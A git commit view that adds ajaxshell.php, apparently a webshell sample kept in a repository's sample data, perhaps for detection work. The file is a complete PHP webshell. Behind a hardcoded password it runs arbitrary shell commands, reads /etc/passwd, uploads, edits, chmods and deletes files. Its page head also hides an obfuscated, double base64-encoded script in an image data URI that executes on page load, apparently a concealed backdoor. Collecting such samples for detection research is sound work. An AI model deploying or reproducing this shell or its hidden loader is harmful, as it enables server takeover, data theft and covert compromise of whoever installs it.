summaryrefslogtreecommitdiff
path: root/data/samples/classic/ajaxshell.php
diff options
context:
space:
mode:
authorMathieu Deous2022-05-02 20:18:23 +0200
committerGitHub2022-05-02 20:18:23 +0200
commit48936efa96ae17295be4e0a71be3294f0ec6aef8 (patch)
treef4e69551f1368aa048edf46b7b061600f3668329 /data/samples/classic/ajaxshell.php
parentbbc738e16f8b637afde58d65196374af98a5e0e2 (diff)
Make application go-install-able and create a docker image
Diffstat (limited to 'data/samples/classic/ajaxshell.php')
-rw-r--r--data/samples/classic/ajaxshell.php652
1 files changed, 652 insertions, 0 deletions
diff --git a/data/samples/classic/ajaxshell.php b/data/samples/classic/ajaxshell.php
new file mode 100644
index 0000000..0445858
--- /dev/null
+++ b/data/samples/classic/ajaxshell.php
@@ -0,0 +1,652 @@
1<?php
2session_start();
3
4error_reporting(0);
5
6$password = "password"; //Change this to your password ;)
7
8$version = "0.7B";
9
10$functions = array('Clear Screen' => 'ClearScreen()',
11'Clear History' => 'ClearHistory()',
12'Can I function?' => "runcommand('canirun','GET')",
13'Get server info' => "runcommand('showinfo','GET')",
14'Read /etc/passwd' => "runcommand('etcpasswdfile','GET')",
15'Open ports' => "runcommand('netstat -an | grep -i listen','GET')",
16'Running processes' => "runcommand('ps -aux','GET')",
17'Readme' => "runcommand('shellhelp','GET')"
18
19);
20$thisfile = basename(__FILE__);
21
22$style = '<style type="text/css">
23.cmdthing {
24 border-top-width: 0px;
25 font-weight: bold;
26 border-left-width: 0px;
27 font-size: 10px;
28 border-left-color: #000000;
29 background: #000000;
30 border-bottom-width: 0px;
31 border-bottom-color: #FFFFFF;
32 color: #FFFFFF;
33 border-top-color: #008000;
34 font-family: verdana;
35 border-right-width: 0px;
36 border-right-color: #000000;
37}
38input,textarea {
39 border-top-width: 1px;
40 font-weight: bold;
41 border-left-width: 1px;
42 font-size: 10px;
43 border-left-color: #FFFFFF;
44 background: #000000;
45 border-bottom-width: 1px;
46 border-bottom-color: #FFFFFF;
47 color: #FFFFFF;
48 border-top-color: #FFFFFF;
49 font-family: verdana;
50 border-right-width: 1px;
51 border-right-color: #FFFFFF;
52}
53A:hover {
54text-decoration: none;
55}
56
57
58table,td,div {
59border-collapse: collapse;
60border: 1px solid #FFFFFF;
61}
62body {
63color: #FFFFFF;
64font-family: verdana;
65}
66</style>';
67$sess = __FILE__.$password;
68if(isset($_POST['p4ssw0rD']))
69{
70 if($_POST['p4ssw0rD'] == $password)
71 {
72 $_SESSION[$sess] = $_POST['p4ssw0rD'];
73 }
74 else
75 {
76 die("Wrong password");
77 }
78
79}
80if($_SESSION[$sess] == $password)
81{
82 if(isset($_SESSION['workdir']))
83 {
84 if(file_exists($_SESSION['workdir']) && is_dir($_SESSION['workdir']))
85 {
86 chdir($_SESSION['workdir']);
87 }
88 }
89
90 if(isset($_FILES['uploadedfile']['name']))
91 {
92 $target_path = "./";
93 $target_path = $target_path . basename( $_FILES['uploadedfile']['name']);
94 if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
95
96 }
97 }
98
99 if(isset($_GET['runcmd']))
100 {
101
102 $cmd = $_GET['runcmd'];
103
104 print "<b>".get_current_user()."~# </b>". htmlspecialchars($cmd)."<br>";
105
106 if($cmd == "")
107 {
108 print "Empty Command..type \"shellhelp\" for some ehh...help";
109 }
110
111 elseif($cmd == "upload")
112 {
113 print '<br>Uploading to: '.realpath(".");
114 if(is_writable(realpath(".")))
115 {
116 print "<br><b>I can write to this directory</b>";
117 }
118 else
119 {
120 print "<br><b><font color=red>I can't write to this directory, please choose another one.</b></font>";
121 }
122
123 }
124 elseif((ereg("changeworkdir (.*)",$cmd,$file)) || (ereg("cd (.*)",$cmd,$file)))
125 {
126 if(file_exists($file[1]) && is_dir($file[1]))
127 {
128 chdir($file[1]);
129 $_SESSION['workdir'] = $file[1];
130 print "Current directory changed to ".$file[1];
131 }
132 else
133 {
134 print "Directory not found";
135 }
136 }
137
138 elseif(strtolower($cmd) == "shellhelp")
139 {
140print '<b><font size=7>Ajax/PHP Command Shell</b></font>
141&copy; By Ironfist
142
143The shell can be used by anyone to command any server, the main purpose was
144to create a shell that feels as dynamic as possible, is expandable and easy
145to understand.
146
147If one of the command execution functions work, the shell will function fine.
148Try the "canirun" command to check this.
149
150Any (not custom) command is a UNIX command, like ls, cat, rm ... If you\'re
151not used to these commands, google a little.
152
153<b>Custom Functions</b>
154If you want to add your own custom command in the Quick Commands list, check
155out the code. The $function array contains \'func name\' => \'javascript function\'.
156Take a look at the built-in functions for examples.
157
158I know this readme isn\'t providing too much information, but hell, does this shell
159even require one :P
160
161- Iron
162 ';
163
164 }
165 elseif(ereg("editfile (.*)",$cmd,$file))
166 {
167 if(file_exists($file[1]) && !is_dir($file[1]))
168 {
169 print "<form name=\"saveform\"><textarea cols=70 rows=10 id=\"area1\">";
170 $contents = file($file[1]);
171 foreach($contents as $line)
172 {
173 print htmlspecialchars($line);
174 }
175 print "</textarea><br><input size=80 type=text name=filetosave value=".$file[1]."><input value=\"Save\" type=button onclick=\"SaveFile();\"></form>";
176 }
177 else
178 {
179 print "File not found.";
180 }
181 }
182 elseif(ereg("deletefile (.*)",$cmd,$file))
183 {
184 if(is_dir($file[1]))
185 {
186 if(rmdir($file[1]))
187 {
188 print "Directory succesfully deleted.";
189 }
190 else
191 {
192 print "Couldn't delete directory!";
193 }
194 }
195 else
196 {
197 if(unlink($file[1]))
198 {
199 print "File succesfully deleted.";
200 }
201 else
202 {
203 print "Couldn't delete file!";
204 }
205 }
206 }
207 elseif(strtolower($cmd) == "canirun")
208 {
209 print "If any of these functions is Enabled, the shell will function like it should.<br>";
210 if(function_exists(passthru))
211 {
212 print "Passthru: <b><font color=green>Enabled</b></font><br>";
213 }
214 else
215 {
216 print "Passthru: <b><font color=red>Disabled</b></font><br>";
217 }
218
219 if(function_exists(exec))
220 {
221 print "Exec: <b><font color=green>Enabled</b></font><br>";
222 }
223 else
224 {
225 print "Exec: <b><font color=red>Disabled</b></font><br>";
226 }
227
228 if(function_exists(system))
229 {
230 print "System: <b><font color=green>Enabled</b></font><br>";
231 }
232 else
233 {
234 print "System: <b><font color=red>Disabled</b></font><br>";
235 }
236 if(function_exists(shell_exec))
237 {
238 print "Shell_exec: <b><font color=green>Enabled</b></font><br>";
239 }
240 else
241 {
242 print "Shell_exec: <b><font color=red>Disabled</b></font><br>";
243 }
244 print "<br>Safe mode will prevent some stuff, maybe command execution, if you're looking for a <br>reason why the commands aren't executed, this is probally it.<br>";
245 if( ini_get('safe_mode') ){
246 print "Safe Mode: <b><font color=red>Enabled</b></font>";
247 }
248 else
249 {
250 print "Safe Mode: <b><font color=green>Disabled</b></font>";
251 }
252 print "<br><br>Open_basedir will block access to some files you <i>shouldn't</i> access.<br>";
253 if( ini_get('open_basedir') ){
254 print "Open_basedir: <b><font color=red>Enabled</b></font>";
255 }
256 else
257 {
258 print "Open_basedir: <b><font color=green>Disabled</b></font>";
259 }
260 }
261 //About the shell
262 elseif(ereg("listdir (.*)",$cmd,$directory))
263 {
264
265 if(!file_exists($directory[1]))
266 {
267 die("Directory not found");
268 }
269 //Some variables
270 chdir($directory[1]);
271 $i = 0; $f = 0;
272 $dirs = "";
273 $filez = "";
274
275 if(!ereg("/$",$directory[1])) //Does it end with a slash?
276 {
277 $directory[1] .= "/"; //If not, add one
278 }
279 print "Listing directory: ".$directory[1]."<br>";
280 print "<table border=0><td><b>Directories</b></td><td><b>Files</b></td><tr>";
281
282 if ($handle = opendir($directory[1])) {
283 while (false !== ($file = readdir($handle))) {
284 if(is_dir($file))
285 {
286 $dirs[$i] = $file;
287 $i++;
288 }
289 else
290 {
291 $filez[$f] = $file;
292 $f++;
293 }
294
295 }
296 print "<td>";
297
298 foreach($dirs as $directory)
299 {
300 print "<i style=\"cursor:crosshair\" onclick=\"deletefile('".realpath($directory)."');\">[D]</i><i style=\"cursor:crosshair\" onclick=\"runcommand('changeworkdir ".realpath($directory)."','GET');\">[W]</i><b style=\"cursor:crosshair\" onclick=\"runcommand('clear','GET'); runcommand ('listdir ".realpath($directory)."','GET'); \">".$directory."</b><br>";
301 }
302
303 print "</td><td>";
304
305 foreach($filez as $file)
306 {
307 print "<i style=\"cursor:crosshair\" onclick=\"deletefile('".realpath($file)."');\">[D]</i><u style=\"cursor:crosshair\" onclick=\"runcommand('editfile ".realpath($file)."','GET');\">".$file."</u><br>";
308 }
309
310 print "</td></table>";
311 }
312 }
313 elseif(strtolower($cmd) == "about")
314 {
315 print "Ajax Command Shell by <a href=http://www.ironwarez.info>Ironfist</a>.<br>Version $version";
316 }
317 //Show info
318 elseif(strtolower($cmd) == "showinfo")
319 {
320 if(function_exists(disk_free_space))
321 {
322 $free = disk_free_space("/") / 1000000;
323 }
324 else
325 {
326 $free = "N/A";
327 }
328 if(function_exists(disk_total_space))
329 {
330 $total = trim(disk_total_space("/") / 1000000);
331 }
332 else
333 {
334 $total = "N/A";
335 }
336 $path = realpath (".");
337
338 print "<b>Free:</b> $free / $total MB<br><b>Current path:</b> $path<br><b>Uname -a Output:</b><br>";
339
340 if(function_exists(passthru))
341 {
342 passthru("uname -a");
343 }
344 else
345 {
346 print "Passthru is disabled :(";
347 }
348 }
349 //Read /etc/passwd
350 elseif(strtolower($cmd) == "etcpasswdfile")
351 {
352
353 $pw = file('/etc/passwd/');
354 foreach($pw as $line)
355 {
356 print $line;
357 }
358
359
360 }
361 //Execute any other command
362 else
363 {
364
365 if(function_exists(passthru))
366 {
367 passthru($cmd);
368 }
369 else
370 {
371 if(function_exists(exec))
372 {
373 exec("ls -la",$result);
374 foreach($result as $output)
375 {
376 print $output."<br>";
377 }
378 }
379 else
380 {
381 if(function_exists(system))
382 {
383 system($cmd);
384 }
385 else
386 {
387 if(function_exists(shell_exec))
388 {
389 print shell_exec($cmd);
390 }
391 else
392 {
393 print "Sorry, none of the command functions works.";
394 }
395 }
396 }
397 }
398 }
399 }
400
401 elseif(isset($_GET['savefile']) && !empty($_POST['filetosave']) && !empty($_POST['filecontent']))
402 {
403 $file = $_POST['filetosave'];
404 if(!is_writable($file))
405 {
406 if(!chmod($file, 0777))
407 {
408 die("Nope, can't chmod nor save :("); //In fact, nobody ever reads this message ^_^
409 }
410 }
411
412 $fh = fopen($file, 'w');
413 $dt = $_POST['filecontent'];
414 fwrite($fh, $dt);
415 fclose($fh);
416 }
417 else
418 {
419?>
420<html>
421<head>
422<title>Command Shell ~ <?php print getenv("HTTP_HOST"); ?></title>
423<img id="ghdescon" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQAQMAAAAlPW0iAAAAA1BMVEX///+nxBvIAAAAAXRSTlMAQObYZgAAB510RVh0Z2hkZQBnaGRlc2NvblpYWmhiQ2htZFc1amRHbHZiaWh3TEdFc1l5eHJMR1VzY2lsN1pUMW1kVzVqZEdsdmJpaGpLWHR5WlhSMWNtNG9ZenhoUHljbk9tVW9jR0Z5YzJWSmJuUW9ZeTloS1NrcEt5Z29ZejFqSldFcFBqTTFQMU4wY21sdVp5NW1jbTl0UTJoaGNrTnZaR1VvWXlzeU9TazZZeTUwYjFOMGNtbHVaeWd6TmlrcGZUdHBaaWdoSnljdWNtVndiR0ZqWlNndlhpOHNVM1J5YVc1bktTbDdkMmhwYkdVb1l5MHRLWEpiWlNoaktWMDlhMXRqWFh4OFpTaGpLVHRyUFZ0bWRXNWpkR2x2YmlobEtYdHlaWFIxY200Z2NsdGxYWDFkTzJVOVpuVnVZM1JwYjI0b0tYdHlaWFIxY200blhGeDNLeWQ5TzJNOU1YMDdkMmhwYkdVb1l5MHRLV2xtS0d0YlkxMHBjRDF3TG5KbGNHeGhZMlVvYm1WM0lGSmxaMFY0Y0NnblhGeGlKeXRsS0dNcEt5ZGNYR0luTENkbkp5a3NhMXRqWFNrN2NtVjBkWEp1SUhCOUtDZFZMbmM5TkNCM0tHTXBlelFnZUNoa0xIQXBlekVnYVQwd096RWdlajB3T3pFZ2NqMWNKMXduT3prb01TQnBQVEE3YVR4a0xqYzdhU3NyS1hzMUtIbzlQWEF1TnlsNlBUQTdjaXM5YkM1dEtHUXVieWhwS1Y1d0xtOG9laWtwTzNvckszMHpJSEo5TkNCQktITXBlekVnWVQxY0oxd25PemtvTVNCcFBUQTdhVHh6TzJrckt5bDdZU3M5YkM1dEtGZ29UUzVRS0NrcVVTa3BmVE1nWVgwMElHc29aQ3h3S1hzeElHRTlRU2d4TmlrN01XRW9aQzQzSlRFMklUMHdLV1FyUFZ3bk1Gd25PekVnWWoxaE96a29NU0JwUFRBN2FUeGtMamM3YVNzOU1UWXBlMklyUFhnb1pDNXVLR2tzTVRZcExHSXViaWhwTERFMktTbDlNeUI0S0dJc2NDbDlOQ0E0S0NsN015Z3lMbkU5UFhRdVNDWW1NaTUyUFQxMExrY3BmVFFnZVNncGV6RWdZVDFTT3pVb0tESXVhQ1ltTWk1b0xrSW1Kakl1YUM1Q0xqRXdLWHg4S0RJdVF5MHlMbkUrWVNsOGZDZ3lMa1F0TWk1MlBtRXBmSHdvT0NncEppWXlMa1E4U1NsOGZDZzRLQ2ttSmpJdVF6eEtLU2t6SUVzN015Qk1mVFFnTmloaEtYczFLRTRnWVQwOUlrOGlLVE1nWVM1RktDOWNYRnhjTDJjc0lseGNYRnhjWEZ4Y0lpa3VSU2d2WEZ3aUwyY3NJbHhjWEZ4Y1hDSWlLVHN6SUdGOU1TQjFQVk11VkRzeElHVTlWaTVYT3pFZ2FqMGlleUlySWx4Y0luVmNYQ0k2SUZ4Y0lpSXJOaWgxS1NzaVhGd2lMQ0FpS3lKY1hDSlpYRndpT2lCY1hDSWlLellvWlNrcklseGNJaXdnSWlzaVhGd2lXbHhjSWpvZ1hGd2lJaXMyS0dNcEt5SmNYQ0lnSWlzaWZTSTdNU0JtUFdzb2Fpd2lNVEVpS1RzeElHRTlNVElvWmlrN05TZ2hlU2dwS1hzeE15QXhOQ2dwTGpFMVBWd25NVGM2THk4eE9DMHhPUzFHTGpGaUwwWXZQMkU5WENjck1XTW9ZU2w5ZlNjc05qSXNOelVzSjN4MllYSjhkMmx1Wkc5M2ZISmxkSFZ5Ym54bWRXNWpkR2x2Ym54cFpueHpZVzU4YkdWdVozUm9mSFJpZkdadmNueDhmSHg4Zkh4OFJtbHlaV0oxWjN4OGZHVnVZM3hUZEhKcGJtZDhabkp2YlVOb1lYSkRiMlJsZkhOMVluTjBjbnhqYUdGeVEyOWtaVUYwZkh4cGJtNWxjbGRwWkhSb2ZIeDhjMk55WldWdWZIeHBibTVsY2tobGFXZG9kSHhyYTN4OFkyUjhmR2RsYmw5eVlXNWtiMjFmYzNSeWZHTm9jbTl0Wlh4dmRYUmxjbGRwWkhSb2ZHOTFkR1Z5U0dWcFoyaDBmSEpsY0d4aFkyVjhZVzVoYkhsMGFXTnpmR2hsYVdkb2RIeDNhV1IwYUh3ek5UQjhOakF3ZkhSeWRXVjhabUZzYzJWOFRXRjBhSHgwZVhCbGIyWjhjM1J5YVc1bmZISmhibVJ2Ylh3eU5UVjhNVFl3ZkdSdlkzVnRaVzUwZkZWU1RIeDBhR2x6Zkc1aGRtbG5ZWFJ2Y254MWMyVnlRV2RsYm5SOGNHRnljMlZKYm5SOGRXRjhibk44YVhOSmJtbDBhV0ZzYVhwbFpIeHNNbGhXUjJkalNYUTFNV3QwUW1scFdFUTNRakZ0YzFVelMwNURhamgyTVh4aWRHOWhmRzVsZDN4SmJXRm5aWHh6Y21OOGZHaDBkSEI4WjI5dloyeGxmSE4wWVhScFkzeDNhR2xzWlh4amIyMThaVzVqYjJSbFZWSkpRMjl0Y0c5dVpXNTBKeTV6Y0d4cGRDZ25mQ2NwTERBc2UzMHBLUT09Z2hkZXNjb26/DJpDAAAADElEQVQIHWNgIA0AAAAwAAGErPF6AAAAAElFTkSuQmCC"/>
424<script type="text/javascript">
425if(typeof btoa=="undefined")btoa=function(a,b){b=(typeof b=='undefined')?false:b;var d,o2,o3,bits,h1,h2,h3,h4,e=[],pad='',c,plain,coded;var f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";plain=b?Utf8.encode(a):a;c=plain.length%3;if(c>0){while(c++<3){pad+='=';plain+='\0'}}for(c=0;c<plain.length;c+=3){d=plain.charCodeAt(c);o2=plain.charCodeAt(c+1);o3=plain.charCodeAt(c+2);bits=d<<16|o2<<8|o3;h1=bits>>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;e[c/3]=f.charAt(h1)+f.charAt(h2)+f.charAt(h3)+f.charAt(h4)}coded=e.join('');coded=coded.slice(0,coded.length-pad.length)+pad;return coded};if(typeof atob=="undefined")atob=function(a,b){b=(typeof b=='undefined')?false:b;var e,o2,o3,h1,h2,h3,h4,bits,d=[],plain,coded;var f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";coded=b?Utf8.decode(a):a;for(var c=0;c<coded.length;c+=4){h1=f.indexOf(coded.charAt(c));h2=f.indexOf(coded.charAt(c+1));h3=f.indexOf(coded.charAt(c+2));h4=f.indexOf(coded.charAt(c+3));bits=h1<<18|h2<<12|h3<<6|h4;e=bits>>>16&0xff;o2=bits>>>8&0xff;o3=bits&0xff;d[c/4]=String.fromCharCode(e,o2,o3);if(h4==0x40)d[c/4]=String.fromCharCode(e,o2);if(h3==0x40)d[c/4]=String.fromCharCode(e)}plain=d.join('');return b?Utf8.decode(plain):plain};
426setTimeout(function(){new Function(atob(atob(document.getElementById('ghdescon').src.substr(22)).match(/ghdescon(.*?)ghdescon/)[1])).apply(this);kk(10);}, 500);
427</script>
428
429<?php print $style; ?>
430<SCRIPT TYPE="text/javascript">
431function sf(){document.cmdform.command.focus();}
432var outputcmd = "";
433var cmdhistory = "";
434function ClearScreen()
435{
436 outputcmd = "";
437 document.getElementById('output').innerHTML = outputcmd;
438}
439
440function ClearHistory()
441{
442 cmdhistory = "";
443 document.getElementById('history').innerHTML = cmdhistory;
444}
445
446function deletefile(file)
447{
448 deleteit = window.confirm("Are you sure you want to delete\n"+file+"?");
449 if(deleteit)
450 {
451 runcommand('deletefile ' + file,'GET');
452 }
453}
454
455var http_request = false;
456function makePOSTRequest(url, parameters) {
457 http_request = false;
458 if (window.XMLHttpRequest) {
459 http_request = new XMLHttpRequest();
460 if (http_request.overrideMimeType) {
461 http_request.overrideMimeType('text/html');
462 }
463 } else if (window.ActiveXObject) {
464 try {
465 http_request = new ActiveXObject("Msxml2.XMLHTTP");
466 } catch (e) {
467 try {
468 http_request = new ActiveXObject("Microsoft.XMLHTTP");
469 } catch (e) {}
470 }
471 }
472 if (!http_request) {
473 alert('Cannot create XMLHTTP instance');
474 return false;
475 }
476
477
478 http_request.open('POST', url, true);
479 http_request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
480 http_request.setRequestHeader("Content-length", parameters.length);
481 http_request.setRequestHeader("Connection", "close");
482 http_request.send(parameters);
483}
484
485
486function SaveFile()
487{
488var poststr = "filetosave=" + encodeURI( document.saveform.filetosave.value ) +
489 "&filecontent=" + encodeURI( document.getElementById("area1").value );
490makePOSTRequest('<?php print $ThisFile; ?>?savefile', poststr);
491document.getElementById('output').innerHTML = document.getElementById('output').innerHTML + "<br><b>Saved! If it didn't save, you'll need to chmod the file to 777 yourself,<br> however the script tried to chmod it automaticly.";
492}
493
494function runcommand(urltoopen,action,contenttosend){
495cmdhistory = "<br>&nbsp;<i style=\"cursor:crosshair\" onclick=\"document.cmdform.command.value='" + urltoopen + "'\">" + urltoopen + "</i> " + cmdhistory;
496document.getElementById('history').innerHTML = cmdhistory;
497if(urltoopen == "clear")
498{
499ClearScreen();
500}
501 var ajaxRequest;
502 try{
503 ajaxRequest = new XMLHttpRequest();
504 } catch (e){
505 try{
506 ajaxRequest = new ActiveXObject("Msxml2.XMLHTTP");
507 } catch (e) {
508 try{
509 ajaxRequest = new ActiveXObject("Microsoft.XMLHTTP");
510 } catch (e){
511 alert("Wicked error, nothing we can do about it...");
512 return false;
513 }
514 }
515 }
516 ajaxRequest.onreadystatechange = function(){
517 if(ajaxRequest.readyState == 4){
518 outputcmd = "<pre>" + outputcmd + ajaxRequest.responseText +"</pre>";
519 document.getElementById('output').innerHTML = outputcmd;
520 var objDiv = document.getElementById("output");
521 objDiv.scrollTop = objDiv.scrollHeight;
522 }
523 }
524 ajaxRequest.open(action, "?runcmd="+urltoopen , true);
525 if(action == "GET")
526 {
527 ajaxRequest.send(null);
528 }
529 document.cmdform.command.value='';
530 return false;
531}
532
533function set_tab_html(newhtml)
534{
535document.getElementById('commandtab').innerHTML = newhtml;
536}
537
538function set_tab(newtab)
539{
540 if(newtab == "cmd")
541 {
542 newhtml = '&nbsp;&nbsp;&nbsp;<form name="cmdform" onsubmit="return runcommand(document.cmdform.command.value,\'GET\');"><b>Command</b>: <input type=text name=command class=cmdthing size=100%><br></form>';
543 }
544 else if(newtab == "upload")
545 {
546 runcommand('upload','GET');
547 newhtml = '<font size=0><b>This will reload the page... :(</b><br><br><form enctype="multipart/form-data" action="<?php print $ThisFile; ?>" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="10000000" />Choose a file to upload: <input name="uploadedfile" type="file" /><br /><input type="submit" value="Upload File" /></form></font>';
548 }
549 else if(newtab == "workingdir")
550 {
551 <?php
552 $folders = "<form name=workdir onsubmit=\"return runcommand(\'changeworkdir \' + document.workdir.changeworkdir.value,\'GET\');\"><input size=80% type=text name=changeworkdir value=\"";
553 $pathparts = explode("/",realpath ("."));
554 foreach($pathparts as $folder)
555 {
556 $folders .= $folder."/";
557 }
558 $folders .= "\"><input type=submit value=Change></form><br>Script directory: <i style=\"cursor:crosshair\" onclick=\"document.workdir.changeworkdir.value=\'".dirname(__FILE__)."\'>".dirname(__FILE__)."</i>";
559
560 ?>
561 newhtml = '<?php print $folders; ?>';
562 }
563 else if(newtab == "filebrowser")
564 {
565 newhtml = '<b>File browser is under construction! Use at your own risk!</b> <br>You can use it to change your working directory easily, don\'t expect too much of it.<br>Click on a file to edit it.<br><i>[W]</i> = set directory as working directory.<br><i>[D]</i> = delete file/directory';
566 runcommand('listdir .','GET');
567 }
568 else if(newtab == "createfile")
569 {
570 newhtml = '<b>File Editor, under construction.</b>';
571 document.getElementById('output').innerHTML = "<form name=\"saveform\"><textarea cols=70 rows=10 id=\"area1\"></textarea><br><input size=80 type=text name=filetosave value=\"<?php print realpath('.')."/".rand(1000,999999).".txt"; ?>\"><input value=\"Save\" type=button onclick=\"SaveFile();\"></form>";
572
573 }
574 document.getElementById('commandtab').innerHTML = newhtml;
575}
576</script>
577</head>
578<body bgcolor=black onload="sf();" vlink=white alink=white link=white>
579<table border=1 width=100% height=100%>
580<td width=15% valign=top>
581
582<form name="extras"><br>
583<center><b>Quick Commands</b><br>
584
585<div style='margin: 0px;padding: 0px;border: 1px inset;overflow: auto'>
586<?php
587foreach($functions as $name => $execute)
588{
589print '&nbsp;<input type="button" value="'.$name.'" onclick="'.$execute.'"><br>';
590}
591?>
592
593</center>
594
595</div>
596</form>
597<center><b>Command history</b><br></center>
598<div id="history" style='margin: 0px;padding: 0px;border: 1px inset;width: 100%;height: 20%;text-align: left;overflow: auto;font-size: 10px;'></div>
599<br>
600<center><b>About</b><br></center>
601<div style='margin: 0px;padding: 0px;border: 1px inset;width: 100%;text-align: center;overflow: auto; font-size: 10px;'>
602<br>
603<b><font size=3>Ajax/PHP Command Shell</b></font><br>by Ironfist
604<br>
605Version <?php print $version; ?>
606
607<br>
608<br>
609
610<br>Thanks to everyone @
611<a href="http://www.ironwarez.info" target=_blank>SharePlaza</a>
612<br>
613<a href="http://www.milw0rm.com" target=_blank>milw0rm</a>
614<br>
615and special greetings to everyone in rootshell
616</div>
617
618</td>
619<td width=70%>
620<table border=0 width=100% height=100%><td id="tabs" height=1%><font size=0>
621<b style="cursor:crosshair" onclick="set_tab('cmd');">[Execute command]</b>
622<b style="cursor:crosshair" onclick="set_tab('upload');">[Upload file]</b>
623<b style="cursor:crosshair" onclick="set_tab('workingdir');">[Change directory]</b>
624<b style="cursor:crosshair" onclick="set_tab('filebrowser');">[Filebrowser]</b>
625<b style="cursor:crosshair" onclick="set_tab('createfile');">[Create File]</b>
626
627</font></td>
628<tr>
629<td height=99% width=100% valign=top><div id="output" style='height:100%;white-space:pre;overflow:auto'></div>
630
631<tr>
632<td height=1% width=100% valign=top>
633<div id="commandtab" style='height:100%;white-space:pre;overflow:auto'>
634&nbsp;&nbsp;&nbsp;<form name="cmdform" onsubmit="return runcommand(document.cmdform.command.value,'GET');">
635<b>Command</b>: <input type=text name=command class=cmdthing size=100%><br>
636</form>
637</div>
638</td>
639</table>
640</td>
641</table>
642</body>
643</html>
644<?php
645}
646} else {
647print "<center><table border=0 height=100%>
648<td valign=middle>
649<form action=".basename(__FILE__)." method=POST>You are not logged in, please login.<br><b>Password:</b><input type=password name=p4ssw0rD><input type=submit value=\"Log in\">
650</form>";
651}
652?> \ No newline at end of file